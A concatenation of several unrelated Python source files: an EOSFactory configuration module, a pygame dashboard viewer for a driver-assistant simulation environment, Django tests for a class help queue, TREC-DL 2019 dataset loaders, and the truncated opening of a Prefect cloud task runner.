    files_ = source_files(search_dir, [".wasm"])
    if not files_:
        return
    # Accept only files that sit directly in the build directory, or in a
    # directory named like the build folder.
    files = []
    for file_ in files_:
        parent = os.path.dirname(file_)
        if os.path.basename(parent) == BUILD or parent == search_dir:
            files.append(file_)
    if not files:
        # BUG FIX: previously an empty filtered list fell through to
        # 'files[0]' and raised IndexError.
        return
    if len(files) > 1:
        # Grammar fixed in the user-facing message ('is' -> 'are').
        raise errors.Error('''
There are too many WASM files in the contract build folder
{}
There are files:
{}
'''.format(search_dir, "\n".join(files)))
    return files[0]
def update_vscode(c_cpp_properties_path):
    '''Refresh a VSCode *c_cpp_properties.json* file in place.

    Updates the embedded *eosio.cdt* version string and, under WSL, the
    Ubuntu root path. The file is rewritten only if something changed.

    Args:
        c_cpp_properties_path (str): Path to the c_cpp_properties file;
            may be a Windows path, which is mapped to its WSL form.
    '''
    c_cpp_properties_path = utils.wslMapWindowsLinux(c_cpp_properties_path)
    with open(c_cpp_properties_path) as f:
        original = f.read()
    updated = original

    # Refresh the eosio.cdt version string.
    matches = re.findall(re.compile(EOSIO_CDT_PATTERN), updated)
    if matches:
        updated = updated.replace(matches[0], eosio_cpp_version()[0])

    # Refresh the WSL root path, if any.
    root = wsl_root()
    if root:
        # BUG FIX: this search/replace used to run against the ORIGINAL
        # text, so writing its result clobbered the version update above
        # when both patterns matched. Work on the updated text instead.
        matches = re.findall(re.compile(UBUNTU_PATTERN), updated)
        if matches:
            updated = updated.replace(matches[0], root)

    # Single write at the end, only when the content actually changed.
    if updated != original:
        with open(c_cpp_properties_path, 'w') as f:
            f.write(updated)
def not_defined(config_map):
    '''Return the entries of *config_map* whose value is None.

    Args:
        config_map (dict): A configuration map, e.g. the result of
            :func:`.current_config`.

    Returns:
        dict: The subset of *config_map* with undefined (None) values.
    '''
    # The original tested 'value == None or value is None' -- the identity
    # check alone is sufficient (and the PEP 8 idiom).
    return {key: value for key, value in config_map.items() if value is None}
def installation_dependencies(config_map):
    '''Verify whether 'eosio' and 'eosio.cpp' packages are properly installed.

    Inspects the *EOSIO_VERSION* and *EOSIO_CDT_VERSION* entries of
    *config_map* and prints a note when the installed version differs
    from the one EOSFactory was tested with, or when the version cannot
    be determined at all.

    Args:
        config_map (dict): A configuration map, e.g. the result of
            :func:`.current_config`.
    '''
    eosio_version_ = config_map["EOSIO_VERSION"]
    if eosio_version_ and eosio_version_[0]:
        # A second list element is present only when the installed and the
        # tested versions differ.
        if len(eosio_version_) > 1:
            print('''NOTE!
The version of the installed 'eosio' package is {} while EOSFactory was tested
with version {}
'''.format(
    eosio_version_[0], eosio_version_[1]))
    else:
        # Message typo fixed: 'does not response' -> 'does not respond'.
        print('''Cannot determine the version of the installed 'eosio' package as 'nodeos' does not respond.
''')

    eosio_cpp_version_ = config_map["EOSIO_CDT_VERSION"]
    if eosio_cpp_version_:
        if len(eosio_cpp_version_) > 1:
            print('''NOTE!
The version of the installed 'eosio.cdt' package is {} while EOSFactory was tested with version {}
'''.format(eosio_cpp_version_[0], eosio_cpp_version_[1]))
    else:
        # Message typo fixed: 'does not response' -> 'does not respond'.
        print('''Cannot determine the version of the installed 'eosio.cdt' package as 'eosio-cpp' does not respond.
''')
def current_config(contract_dir=None, dont_set_workspace=False):
    '''Present the current configuration.

    The current configuration results from both the *config.json* file
    setting and the default hard-coded setup. The *config.json* prevails.

    Args:
        contract_dir (str): If set, also resolve and report the files
            (wast/wasm/abi) of the given contract.
        dont_set_workspace (bool): If set, ignore an empty workspace
            directory.

    Note:
        The current configuration can be seen with the bash command:

        *python3 -m eosfactory.core.config*
    '''
    def _safe(getter):
        # Evaluate *getter*; map any failure to None so that one broken
        # setting cannot prevent the whole report from being produced.
        # ('except Exception' replaces the previous bare 'except:' clauses,
        # which also swallowed KeyboardInterrupt/SystemExit.)
        try:
            return getter()
        except Exception:
            return None

    retval = {}
    retval["CONFIG_FILE"] = config_file()
    if not is_site_package():
        retval["EOSFACTORY_DIR"] = _safe(eosf_dir)
    retval["VERSION"] = VERSION
    retval[node_address_[0]] = _safe(http_server_address)
    retval[key_private_[0]] = _safe(eosio_key_private)
    retval[key_public_[0]] = _safe(eosio_key_public)
    retval[wsl_root_[0]] = _safe(wsl_root)
    retval[wallet_address_[0]] = _safe(
        lambda: http_wallet_address()
        if http_wallet_address() else http_server_address())
    retval[chain_state_db_size_mb_[0]] = _safe(chain_state_db_size_mb)
    retval[contract_workspace_dir_[0]] = _safe(
        lambda: contract_workspace_dir(dont_set_workspace))
    retval[keosd_wallet_dir_[0]] = _safe(keosd_wallet_dir)
    retval[cli_exe_[0]] = _safe(cli_exe)
    retval[keosd_exe_[0]] = _safe(keosd_exe)
    retval[node_exe_[0]] = _safe(node_exe)
    retval[eosio_cpp_[0]] = _safe(eosio_cpp)
    retval[eosio_cdt_root_[0]] = _safe(eosio_cdt_root)
    retval[eosio_cpp_includes_[0]] = _safe(eosio_cpp_includes)
    # BUG FIX: on failure this entry used to be stored under libs_[0],
    # silently dropping the includes entry from the report.
    retval[includes_[0]] = _safe(eoside_includes_dir)
    retval[libs_[0]] = _safe(eoside_libs_dir)
    retval[eosfactory_data_[0]] = _safe(eosfactory_data)
    retval[TEMPLATE_DIR[0]] = _safe(template_dir)
    retval[genesis_json_[0]] = genesis_json()
    retval[nodeos_config_dir_[0]] = nodeos_config_dir()
    retval[nodeos_data_dir_[0]] = nodeos_data_dir()
    retval[nodeos_options_[0]] = nodeos_options()
    retval["EOSIO_VERSION"] = eosio_version()
    retval["EOSIO_CDT_VERSION"] = eosio_cpp_version()
    retval[nodeos_stdout_[0]] = nodeos_stdout()
    if contract_dir:
        # BUG FIX: the 'contract_dir' parameter shadows the module-level
        # contract_dir() function, so 'contract_dir(contract_dir)' used to
        # call the hint string and raise TypeError. Look the function up
        # in the module globals instead.
        contract_dir = _safe(
            lambda: globals()["contract_dir"](contract_dir))
        retval["contract-dir"] = contract_dir
        retval["contract-wast"] = _safe(lambda: wast_file(contract_dir))
        retval["contract-wasm"] = _safe(lambda: wasm_file(contract_dir))
        retval["contract-abi"] = _safe(lambda: abi_file(contract_dir))
    return retval
def config():
    '''Print a report of the current EOSFactory configuration.

    Prints the version banner, how EOSFactory is installed, dependency
    version checks, the full configuration map as JSON, and any settings
    that are still undefined.
    '''
    print('''
EOSFactory version {}.
Dependencies:
https://github.com/EOSIO/eos version {}
https://github.com/EOSIO/eosio.cdt version {}
Python version {}
    '''.format(VERSION, EOSIO_VERSION, EOSIO_CDT_VERSION, PYTHON_VERSION)
    )
    # Per the branches below: falsy means an editable (linked) install,
    # 1 a local site package, 2 a global site package.
    is_not_linked = is_site_package()
    if not is_not_linked:
        print(
            '''EOSFactory package is installed as a link to the directory:
'{}'
    '''.format(os.path.join(eosf_dir(), EOSFACTORY_DIR))
        )
    elif is_not_linked == 1:
        print(
            '''EOSFactory is installed as a site package locally.
    '''
        )
    elif is_not_linked == 2:
        print(
            '''EOSFactory is installed as a site package globally.
    '''
        )
    config_map = current_config()
    installation_dependencies(config_map)
    print('''
The current configuration of EOSFactory:
{}
You can overwrite the above settings with entries in the configuration
file located here:
{}
    '''.format(
        json.dumps(
            config_map, sort_keys=True, indent=4), config_file())
    )
    not_defined_ = not_defined(config_map)
    if not_defined_:
        # NOTE(review): the message reads 'undefined setting' (sic); left
        # unchanged here since it is user-facing runtime output.
        print('''
There are undefined setting:
{}
    '''.format(json.dumps(not_defined_, sort_keys=True, indent=4)))
def main():
    '''Command-line entry point.

    usage: config.py [-h] [--wsl_root] [--dependencies]
                     [--dont_set_workspace] [--json] [--workspace]

    Show the configuration of EOSFactory or set contract workspace.

    Args:
        -h, --help            Show this help message and exit
        --wsl_root            Show set the root of the WSL and exit.
        --dependencies        List dependencies of EOSFactory and exit.
        --dont_set_workspace  Ignore empty workspace directory.
        --json                Bare config JSON and exit.
        --workspace           Set contract workspace and exit.

    Note:
        ``--workspace`` is a boolean flag (``action="store_true"``); the
        workspace directory itself is obtained by
        ``set_contract_workspace_dir()``.
    '''
    parser = argparse.ArgumentParser(description='''
    Show the configuration of EOSFactory or set contract workspace.
    ''')
    parser.add_argument(
        "--wsl_root", help="Show set the root of the WSL and exit.",
        action="store_true")
    parser.add_argument(
        "--dependencies", help="List dependencies of EOSFactory and exit.",
        action="store_true")
    parser.add_argument(
        "--dont_set_workspace", help="Ignore empty workspace directory.",
        action="store_true")
    parser.add_argument(
        "--json", help="Bare config JSON and exit.",
        action="store_true")
    parser.add_argument(
        "--workspace", help="Set contract workspace and exit.",
        action="store_true")
    args = parser.parse_args()
    # Mutually exclusive modes; the default (no flag) prints the report.
    if args.dependencies:
        installation_dependencies(current_config())
    elif args.json:
        print(json.dumps(
            current_config(dont_set_workspace=args.dont_set_workspace),
            sort_keys=True, indent=4))
    elif args.wsl_root:
        wsl_root()
    elif args.workspace:
        set_contract_workspace_dir()
    else:
        config()
# Allow running this module directly, e.g. `python3 -m eosfactory.core.config`.
if __name__ == '__main__':
    main()
|
"""Classes and functions for the human interface for the Driver Assistant env.
The human interface is designed to allow a human user manually control
the assistant system. This includes modifying the signal sent to the
driver (i.e. 'x', 'y', 'vx', 'vy') as well as the recommended
acceleration and steering.
Specifically, at each step the human controlled assistant will send
signals and recommendations that equal to the observed values
(in the case of the signals) or 0.0 (in case of the recommendations)
plus the offset specified by the human user.
The offset for each parameter: 'x', 'y', 'vx', 'vy' can be increased or
decreased using the following keys:
parameter increase decrease
-----------------------------------
'x' Q A
'y' W S
'vx' E D
'vy' R F
'acceleration' Right Left
'steering' Up Down
Where Right, Left, Up, Down correspond to the arrow keys on the
keyboard.
"""
import os.path as osp
from typing import TYPE_CHECKING, Tuple, List, Optional
import numpy as np
import pygame as pg
from highway_env.road.graphics import WorldSurface
from highway_env.envs.common.graphics import EnvViewer
from bdgym.envs.driver_assistant.action import (
AssistantContinuousAction,
AssistantContinuousOffsetAction,
AssistantDiscreteAction
)
if TYPE_CHECKING:
from bdgym.envs.driver_assistant.env import DriverAssistantEnv
class DriverAssistantEnvViewer(EnvViewer):
    """A viewer to render a Driver Assistant environment """

    def __init__(self,
                 env: 'DriverAssistantEnv',
                 save_images: bool = False,
                 save_directory: Optional[str] = None):
        super().__init__(env)
        # Image saving is handled by this class, not the parent EnvViewer,
        # so disable the parent mechanism (a bit of a hack, but the
        # simplest way to achieve this).
        self.SAVE_IMAGES = False
        self.save_images = save_images
        self.directory = save_directory

    def display(self) -> None:
        super().display()
        if self.save_images and self.directory:
            # Zero-pad the frame counter to six digits for stable sorting.
            frame_name = f"frame_{str(self.frame).zfill(6)}.png"
            pg.image.save(self.screen, osp.join(self.directory, frame_name))
            self.frame += 1

    def handle_events(self) -> None:
        """Overrides parent."""
        if not self.env.config["manual_control"]:
            super().handle_events()
        # Under manual control all events are handled by
        # bdgym.envs.driver_assistant.manual_control.AssistantEventHandler
class AssistantActionDisplayer:
    """A callable class for displaying the Assistant's actions in viewer """
    # Observation features that are never shown on the dashboard.
    IGNORE_FEATURES = ['presence']
    def __init__(self, env: 'DriverAssistantEnv'):
        self.env = env
        self.font = pg.font.Font(None, 26)
        # Off-screen surface the three dashboard panels are drawn onto.
        self.surface = pg.Surface(
            (self.env.config["screen_width"], self.env.config["screen_height"])
        )
        self.width = self.surface.get_width()
        self.height = self.surface.get_height()
        # Display for what the Assistant Observes
        self.assistant_obs_parameters = []
        # Column indices of ignored features, used to filter raw observations.
        self.obs_ignore_idxs = []
        for i, f in enumerate(self.env.config['observation']['features']):
            if f not in self.IGNORE_FEATURES:
                self.assistant_obs_parameters.append(f)
            else:
                self.obs_ignore_idxs.append(i)
        # The screen is split vertically into three equal panels:
        # assistant observation, assistant action, driver observation.
        self.assistant_display = DashboardDisplay(
            "Assistant Observation",
            self.surface,
            width=self.width,
            height=self.height // 3,
            position=(0, 0),
            parameters=self.assistant_obs_parameters
        )
        # Display for the current Assistant action
        self.assistant_action = DashboardDisplay(
            "Assistant Action",
            self.surface,
            width=self.width,
            height=self.height // 3,
            position=(0, self.height // 3),
            parameters=list(AssistantContinuousAction.ASSISTANT_ACTION_INDICES)
        )
        # Display for what the Driver Observes
        self.driver_display = DashboardDisplay(
            "Driver observation",
            self.surface,
            width=self.width,
            height=self.height // 3,
            position=(0, 2*(self.height // 3)),
            parameters=list(AssistantContinuousAction.ASSISTANT_ACTION_INDICES)
        )
    def _get_assistant_action_title(self):
        # Title depends on whether the action type reports absolute values
        # (continuous) or offsets (continuous-offset / discrete).
        assistant_action_type = self.env.action_type.assistant_action_type
        if isinstance(assistant_action_type, AssistantContinuousAction):
            return (
                "Assistant Action (Driver observation & action recommendation)"
            )
        if isinstance(
                assistant_action_type,
                (AssistantContinuousOffsetAction, AssistantDiscreteAction)
        ):
            return (
                "Current Offsets applied to Driver observation & "
                "recommendation"
            )
        raise ValueError(
            "Unsupported Assistant Action Type for Assistant action display: "
            f"{assistant_action_type}. Either use supported action type or "
            "disable action display with the 'action_display' environment "
            "configuration parameter"
        )
    def _get_assistant_ego_obs(self) -> np.ndarray:
        # Ego-vehicle row of the last assistant observation, with the
        # ignored feature columns dropped.
        raw_obs = self.env.last_assistant_obs[
            self.env.observation_type.ASSISTANT_EGO_ROW
        ]
        obs = []
        for i in range(raw_obs.shape[0]):
            if i not in self.obs_ignore_idxs:
                obs.append(raw_obs[i])
        return np.array(obs)
    def _get_assistant_action(self) -> np.ndarray:
        # Values for the 'Assistant Action' panel; their meaning depends
        # on the action type in use.
        assistant_action_type = self.env.action_type.assistant_action_type
        if isinstance(assistant_action_type, AssistantContinuousAction):
            return assistant_action_type.last_action
        if isinstance(assistant_action_type, AssistantContinuousOffsetAction):
            return np.zeros(len(self.assistant_obs_parameters))
        if isinstance(assistant_action_type, AssistantDiscreteAction):
            # Assumes last_action[:4] are the signal entries replaced by
            # current_offset, with the remainder kept -- TODO confirm
            # against AssistantDiscreteAction.
            current_offset = assistant_action_type.current_offset
            last_action = assistant_action_type.last_action
            return np.concatenate([current_offset, last_action[4:]])
        raise ValueError(
            "Unsupported Assistant Action Type for Assistant action display: "
            f"{assistant_action_type}. Either use supported action type or "
            "disable action display with the 'action_display' environment "
            "configuration parameter"
        )
    def _get_driver_obs(self) -> np.ndarray:
        # The driver observes the assistant's last action (the signal plus
        # the recommendation), so show that in the driver panel.
        assistant_action_type = self.env.action_type.assistant_action_type
        return assistant_action_type.last_action
    def __call__(self,
                 agent_surface: pg.Surface,
                 sim_surface: WorldSurface) -> None:
        """Draws the assistants last action on agent_surface """
        assistant_obs = self._get_assistant_ego_obs()
        assistant_action = self._get_assistant_action()
        driver_obs = self._get_driver_obs()
        self.assistant_display.display(assistant_obs)
        self.assistant_action.display(assistant_action)
        self.driver_display.display(driver_obs)
        agent_surface.blit(self.surface, (0, 0))
    def render_text(self,
                    surface: pg.Surface,
                    pos: Tuple[float, float],
                    text: str,
                    color: Tuple[int, int, int],
                    bgcolor: Tuple[int, int, int]) -> Tuple[float, float]:
        """Render text on surface """
        text_img = self.font.render(text, 1, color, bgcolor)
        surface.blit(text_img, pos)
        # Return the position just right of the rendered text, so calls
        # can be chained on one line.
        return pos[0] + text_img.get_width() + 5, pos[1]
class DashboardDisplay:
    """A surface that renders a titled row of parameter names and values."""

    RED = (255, 100, 100)
    GREEN = (50, 200, 0)
    BLUE = (100, 200, 255)
    YELLOW = (200, 200, 0)
    BLACK = (60, 60, 60)
    PURPLE = (200, 0, 150)
    DEFAULT_COLOR = YELLOW
    EGO_COLOR = GREEN
    BG_COLOR = PURPLE

    def __init__(self,
                 title: str,
                 parent_surface: pg.SurfaceType,
                 width: int,
                 height: int,
                 position: Tuple[int, int],
                 parameters: List[str],
                 font_size: int = 26,
                 text_color: Tuple[int, int, int] = None,
                 bg_color: Tuple[int, int, int] = None):
        self.title = title
        self.parent_surface = parent_surface
        self.width = width
        self.height = height
        self.position = position
        self.parameters = parameters
        self.font = pg.font.Font(None, font_size)
        # Note: the fallbacks are YELLOW/BLACK, not DEFAULT_COLOR/BG_COLOR.
        self.text_color = text_color if text_color is not None else self.YELLOW
        self.bg_color = bg_color if bg_color is not None else self.BLACK
        # The Dashboard Display surface
        self.surface = pg.Surface((self.width, self.height), flags=pg.SRCALPHA)
        # Layout: title at the top, one column per parameter below it,
        # with names and values on two separate rows.
        self.title_pos = (0.05*self.width, 0.05*self.height)
        self.p_name_y = 0.3 * self.height
        self.p_value_y = 0.65 * self.height
        columns = [0.05*self.width]
        for _ in range(len(self.parameters) - 1):
            columns.append(columns[-1] + 0.15*self.width)
        self.p_x = columns

    def display(self, values: np.ndarray) -> None:
        """Redraw the panel with *values* and blit it onto the parent."""
        self.surface.fill(self.bg_color)
        self.surface.blit(self._text_img(self.title, self.GREEN), self.title_pos)
        for idx, name in enumerate(self.parameters):
            column_x = self.p_x[idx]
            self.surface.blit(
                self._text_img(name, self.text_color),
                [column_x, self.p_name_y])
            self.surface.blit(
                self._text_img(f"{values[idx]:.3f}", self.text_color),
                [column_x, self.p_value_y])
        self.parent_surface.blit(self.surface, self.position)

    def _text_img(self,
                  text: str,
                  text_color: Tuple[int, int, int]) -> pg.SurfaceType:
        return self.font.render(text, True, text_color, self.bg_color)
|
<reponame>take-a-number/api<filename>take_a_number/tests/test_queue.py
from django.test import TestCase
from take_a_number.utils.class_queue import ClassQueue, QueueMember, QueueTA
class QueueTest(TestCase):
    """Unit tests for ClassQueue, QueueMember and QueueTA."""
    # NOTE: a stray '|' artifact fused onto the last line of this class
    # has been removed; assertEqual(True/False, ...) calls were replaced
    # with the idiomatic assertTrue/assertFalse.

    # --- fixture helpers -------------------------------------------------
    def create_member1(self, name="Name1", id=1):
        return QueueMember(name, id)

    def create_member2(self, name="Name2", id=2):
        return QueueMember(name, id)

    def create_member3(self, name="Name3", id=3):
        return QueueMember(name, id)

    def create_ta1(self, name="TA1", id=11):
        return QueueTA(name, id)

    def create_ta2(self, name="TA2", id=12):
        return QueueTA(name, id)

    def create_queue(self):
        return ClassQueue()

    # make sure QueueTA works as desired
    def test_ta_class(self):
        member1 = self.create_member1()
        helping_ta = QueueTA("john", 11, "teaching_assistant", member1)
        self.assertTrue(helping_ta.isHelpingSomeone())
        self.assertTrue(helping_ta.isHelping(member1))
        self.assertEqual(member1, helping_ta.getHelping())
        helping_ta.stopHelping()
        self.assertFalse(helping_ta.isHelpingSomeone())
        self.assertFalse(helping_ta.isHelping(member1))
        helping_ta.startHelping(member1)
        self.assertTrue(helping_ta.isHelpingSomeone())
        self.assertTrue(helping_ta.isHelping(member1))
        self.assertEqual(member1, helping_ta.getHelping())
        self.assertEqual(
            helping_ta.asDict(),
            {'name': 'john', 'id': 11, 'type': 'teaching_assistant',
             'helping': {'name': 'Name1', 'id': 1, 'type': None}})

    # test the queue creation and various functions
    def test_queue_create(self):
        q = ClassQueue('CS1', 'AB1234', [], [], {}, {})
        self.assertTrue(q.isEmpty())
        self.assertEqual(0, q.studentCount())
        self.assertEqual(0, q.taCount())
        self.assertEqual('AB1234', q.studentJoinCode)
        self.assertEqual([], q.getStudentSessionIds())
        self.assertEqual([], q.getTaSessionIds())
        self.assertEqual({'students': [], 'teachingAssistants': []}, q.asDict())
        # Removing unknown ids reports failure with -1
        self.assertEqual(-1, q.removeStudent(10))
        self.assertEqual(-1, q.removeTA(10))

    # enqueue and dequeue students to queue
    def test_enqueue_dequeue(self):
        q = self.create_queue()
        member1 = self.create_member1()
        member2 = self.create_member2()
        member3 = self.create_member3()
        q.enqueue(member1)
        q.enqueue(member2)
        q.enqueue(member3)
        # FIFO order
        self.assertEqual(member1.id, q.dequeue().id)
        self.assertEqual(member2.id, q.dequeue().id)
        self.assertEqual(member3.id, q.dequeue().id)

    # queue access/default fields
    def test_getters(self):
        q = self.create_queue()
        self.assertEqual(0, q.size())
        self.assertTrue(q.isEmpty())
        self.assertFalse(q.hasTas())
        self.assertFalse(q.hasStudents())
        self.assertEqual([], q.tas)
        self.assertEqual([], q.students)
        self.assertEqual({}, q.studentSessions)
        self.assertEqual({}, q.taSessions)
        self.assertEqual(None, q.courseAbbreviation)
        self.assertEqual(None, q.studentJoinCode)

    # add students and tas to a queue
    def test_add(self):
        q = self.create_queue()
        self.assertTrue(q.isEmpty())
        ta1 = self.create_ta1()
        ta2 = self.create_ta2()
        # TAs do not count towards the student queue size
        q.addTA(ta1)
        self.assertTrue(q.isEmpty())
        self.assertEqual(0, q.size())
        q.addTA(ta2)
        self.assertTrue(q.isEmpty())
        self.assertEqual(0, q.size())
        q.enqueue(self.create_member1())
        self.assertFalse(q.isEmpty())
        self.assertEqual(1, q.size())

    # remove students from a queue by id
    def test_remove(self):
        q = self.create_queue()
        self.assertFalse(q.hasTas())
        member1 = self.create_member1()
        member2 = self.create_member2()
        member3 = self.create_member3()
        ta1 = self.create_ta1()
        q.addTA(ta1)
        self.assertTrue(q.isEmpty())
        self.assertTrue(q.hasTas())
        q.enqueue(member1)
        q.enqueue(member2)
        q.enqueue(member3)
        # Removal works regardless of queue position
        self.assertEqual(member1, q.removeStudent(member1.id))
        self.assertEqual(member3, q.removeStudent(member3.id))
        self.assertEqual(member2, q.removeStudent(member2.id))
        self.assertEqual(0, q.size())
        self.assertTrue(q.isEmpty())
        self.assertTrue(q.hasTas())
        q.removeTA(11)
        self.assertFalse(q.hasTas())
        self.assertEqual(0, q.taCount())

    # add students to a queue and check positions
    def test_status(self):
        q = self.create_queue()
        member1 = self.create_member1()
        member2 = self.create_member2()
        member3 = self.create_member3()
        q.enqueue(member1)
        q.enqueue(member2)
        q.enqueue(member3)
        # Positions are zero-based in enqueue order
        self.assertEqual(0, q.position(member1.id))
        self.assertEqual(2, q.position(member3.id))
        self.assertEqual(1, q.position(member2.id))
        self.assertFalse(q.isEmpty())
        self.assertTrue(q.hasStudents())
        self.assertFalse(q.hasTas())

    def test_dict(self):
        member1 = self.create_member1()
        ta1 = self.create_ta1()
        self.assertEqual(member1.asDict(), {'name': 'Name1', 'id': 1, "type": None})
        self.assertEqual(ta1.asDict(), {'name': 'TA1', 'id': 11, 'type': None, 'helping': None})
import sys
import csv
import argparse
from pathlib import Path
from collections import defaultdict
from typing import Dict, Iterable, Set, Tuple
from tqdm import tqdm
from ranking_utils.dataset import ParsableDataset
from ranking_utils.datasets.trec import read_qrels_trec, read_top_trec
# some documents are longer than the default limit
csv.field_size_limit(sys.maxsize)
class TRECDL2019Passage(ParsableDataset):
    """TREC-DL 2019 passage ranking dataset class.
    Args:
        args (argparse.Namespace): Namespace that contains the arguments
    """
    def __init__(self, args: argparse.Namespace):
        self.directory = Path(args.DIRECTORY)
        # Read everything eagerly; the get_* accessors below then just
        # return the already-built maps.
        self._read_all()
        super().__init__(args)
    def _read_all(self):
        """Read the dataset."""
        # read queries
        # The hard-coded totals below only size the tqdm progress bars --
        # presumably the line counts of the official files; TODO confirm.
        self.queries = {}
        for f_name, num_lines in [
            ("queries.train.tsv", 808731),
            ("queries.dev.tsv", 101093),
            ("msmarco-test2019-queries.tsv", 200),
        ]:
            f = self.directory / f_name
            print(f"reading {f}...")
            with open(f, encoding="utf-8", newline="") as fp:
                reader = csv.reader(fp, delimiter="\t")
                for q_id, query in tqdm(reader, total=num_lines):
                    self.queries[q_id] = query
        # read documents
        self.docs = {}
        f = self.directory / "collection.tsv"
        print(f"reading {f}...")
        with open(f, encoding="utf-8", newline="") as fp:
            reader = csv.reader(fp, delimiter="\t")
            for doc_id, doc in tqdm(reader, total=8841823):
                self.docs[doc_id] = doc
        # read qrels
        self.qrels = defaultdict(dict)
        # q_ids tracks, per qrels file, which query ids it contributed;
        # used below to form the train/val/test splits.
        q_ids = defaultdict(set)
        for f_name, num_lines in [
            ("qrels.train.tsv", 532761),
            ("qrels.dev.tsv", 59273),
        ]:
            f = self.directory / f_name
            print(f"reading {f}...")
            with open(f, encoding="utf-8", newline="") as fp:
                reader = csv.reader(fp, delimiter="\t")
                for q_id, _, doc_id, rel in tqdm(reader, total=num_lines):
                    self.qrels[q_id][doc_id] = int(rel)
                    q_ids[f_name].add(q_id)
        # TREC qrels have a different format
        f = self.directory / "2019qrels-pass.txt"
        print(f"reading {f}...")
        with open(f, encoding="utf-8", newline="") as fp:
            for q_id, _, doc_id, rel in csv.reader(fp, delimiter=" "):
                # 1 is considered irrelevant
                self.qrels[q_id][doc_id] = int(rel) - 1
                q_ids["2019qrels-pass.txt"].add(q_id)
        # read top documents
        self.pools = defaultdict(set)
        for f_name, num_lines in [
            ("top1000.dev.tsv", 6668967),
            ("msmarco-passagetest2019-top1000.tsv", 189877),
            ("top1000.train.txt", 478016942),
        ]:
            f = self.directory / f_name
            print(f"reading {f}...")
            with open(f, encoding="utf-8", newline="") as fp:
                reader = csv.reader(fp, delimiter="\t")
                for q_id, doc_id, _, _ in tqdm(reader, total=num_lines):
                    self.pools[q_id].add(doc_id)
        # some IDs have no pool or no query -- remove them
        all_ids = set(self.pools.keys()) & set(self.queries.keys())
        self.train_ids = q_ids["qrels.train.tsv"] & all_ids
        self.val_ids = q_ids["qrels.dev.tsv"] & all_ids
        self.test_ids = q_ids["2019qrels-pass.txt"] & all_ids
    def get_queries(self) -> Dict[str, str]:
        """Return all queries.
        Returns:
            Dict[str, str]: Query IDs mapped to queries
        """
        return self.queries
    def get_docs(self) -> Dict[str, str]:
        """Return all documents.
        Returns:
            Dict[str, str]: Document IDs mapped to documents
        """
        return self.docs
    def get_qrels(self) -> Dict[str, Dict[str, int]]:
        """Return all query relevances.
        Returns:
            Dict[str, Dict[str, int]]: Query IDs mapped to document IDs mapped to relevance
        """
        return self.qrels
    def get_pools(self) -> Dict[str, Set[str]]:
        """Return all pools.
        Returns:
            Dict[str, Set[str]]: Query IDs mapped to top retrieved documents
        """
        return self.pools
    def get_folds(self) -> Iterable[Tuple[Set[str], Set[str], Set[str]]]:
        """Return all folds.
        Returns:
            Iterable[Tuple[Set[str], Set[str], Set[str]]]: Folds of train, validation and test query IDs
        """
        # A single fold: the fixed train/dev/test2019 split.
        return [(self.train_ids, self.val_ids, self.test_ids)]
class TRECDL2019Document(ParsableDataset):
    """TREC-DL 2019 document ranking dataset class.
    Args:
        args (argparse.Namespace): Namespace that contains the arguments
    """
    def __init__(self, args: argparse.Namespace):
        self.directory = Path(args.DIRECTORY)
        # Only the queries are read eagerly here; documents, qrels and
        # pools are loaded on demand by their get_* methods.
        self._read_queries()
        super().__init__(args)
    def _read_queries(self):
        """Read the queries and split."""
        def _read_queries(fname):
            # Inner helper (intentionally shadows the method name):
            # read one TSV file of (query id, query) pairs.
            result = {}
            with open(fname, encoding="utf-8", newline="") as fp:
                for q_id, query in csv.reader(fp, delimiter="\t"):
                    result[q_id] = query
            return result
        train_queries = _read_queries(self.directory / "msmarco-doctrain-queries.tsv")
        dev_queries = _read_queries(self.directory / "msmarco-docdev-queries.tsv")
        test_queries = _read_queries(self.directory / "msmarco-test2019-queries.tsv")
        self.queries = {}
        self.queries.update(train_queries)
        self.queries.update(dev_queries)
        self.queries.update(test_queries)
        # The split is defined purely by which file a query came from.
        self.train_ids = set(train_queries.keys())
        self.test_ids = set(test_queries.keys())
        self.val_ids = set(dev_queries.keys())
    def get_queries(self) -> Dict[str, str]:
        """Return all queries.
        Returns:
            Dict[str, str]: Query IDs mapped to queries
        """
        return self.queries
    def get_docs(self) -> Dict[str, str]:
        """Return all documents.
        Returns:
            Dict[str, str]: Document IDs mapped to documents
        """
        docs = {}
        with open(
            self.directory / "msmarco-docs.tsv", encoding="utf-8", newline=""
        ) as fp:
            # total= only sizes the tqdm progress bar.
            for doc_id, _, title, body in tqdm(
                csv.reader(fp, delimiter="\t"), total=3213835
            ):
                # Each document text is its title prepended to its body.
                doc = title + ". " + body
                docs[doc_id] = doc
        return docs
    def get_qrels(self) -> Dict[str, Dict[str, int]]:
        """Return all query relevances.
        Returns:
            Dict[str, Dict[str, int]]: Query IDs mapped to document IDs mapped to relevance
        """
        qrels = {}
        qrels.update(read_qrels_trec(self.directory / "msmarco-doctrain-qrels.tsv"))
        qrels.update(read_qrels_trec(self.directory / "msmarco-docdev-qrels.tsv"))
        qrels.update(read_qrels_trec(self.directory / "2019qrels-docs.txt"))
        return qrels
    def get_pools(self) -> Dict[str, Set[str]]:
        """Return all pools.
        Returns:
            Dict[str, Set[str]]: Query IDs mapped to top retrieved documents
        """
        top = {}
        top.update(read_top_trec(self.directory / "msmarco-doctrain-top100"))
        top.update(read_top_trec(self.directory / "msmarco-docdev-top100"))
        top.update(read_top_trec(self.directory / "msmarco-doctest2019-top100"))
        return top
    def get_folds(self) -> Iterable[Tuple[Set[str], Set[str], Set[str]]]:
        """Return all folds.
        Returns:
            Iterable[Tuple[Set[str], Set[str], Set[str]]]: Folds of train, validation and test query IDs
        """
        # A single fold: the fixed train/dev/test2019 split.
        return [(self.train_ids, self.val_ids, self.test_ids)]
|
import copy
import datetime
import warnings
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union
import prefect
from prefect.client import Client
from prefect.core import Edge, Task
from prefect.engine.cloud.utilities import prepare_state_for_cloud
from prefect.engine.result import NoResult, Result
from prefect.engine.result_handlers import ResultHandler
from prefect.engine.runner import ENDRUN, call_state_handlers
from prefect.engine.state import Cached, Failed, Mapped, State
from prefect.engine.task_runner import TaskRunner, TaskRunnerInitializeResult
from prefect.utilities.graphql import with_args
class CloudTaskRunner(TaskRunner):
    """
    TaskRunners handle the execution of Tasks and determine the State of a Task
    before, during and after the Task is run.
    In particular, through the TaskRunner you can specify the states of any upstream dependencies,
    and what state the Task should be initialized with.
    Args:
        - task (Task): the Task to be run / executed
        - state_handlers (Iterable[Callable], optional): A list of state change handlers
            that will be called whenever the task changes state, providing an
            opportunity to inspect or modify the new state. The handler
            will be passed the task runner instance, the old (prior) state, and the new
